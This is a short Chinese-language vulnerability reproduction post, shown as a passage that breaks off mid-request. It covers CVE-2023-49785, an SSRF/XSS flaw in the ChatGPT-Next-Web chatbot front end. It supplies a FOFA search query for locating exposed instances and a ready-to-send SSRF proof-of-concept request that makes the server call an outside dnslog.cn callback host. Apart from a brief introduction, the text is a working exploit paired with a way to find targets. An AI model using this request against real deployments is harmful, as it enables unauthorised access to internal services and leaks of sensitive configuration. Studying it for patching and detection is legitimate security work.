0x01 產(chǎn)品簡(jiǎn)介

ChatGPT-Next-Web 是一種基于 OpenAI 的 GPT-3.5 、GPT-4.0語(yǔ)言模型的產(chǎn)品。它是設(shè)計(jì)用于 Web 環(huán)境中的聊天機(jī)器人，旨在為用戶提供自然語(yǔ)言交互和智能對(duì)話的能力。

0x02 漏洞概述

2024年3月，互聯(lián)網(wǎng)上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS 漏洞,未經(jīng)身份驗(yàn)證的攻擊者可利用此漏洞構(gòu)造惡意請(qǐng)求獲取系統(tǒng)內(nèi)部敏感信息及配置文件，造成信息泄露。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：app="ChatGPT-Next-Web"

0x04 漏洞復(fù)現(xiàn)

SSRF-PoC

GET /api/cors/http:%2f%2fnextchat.2222222222.pb0e92.dnslog.cn%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connectio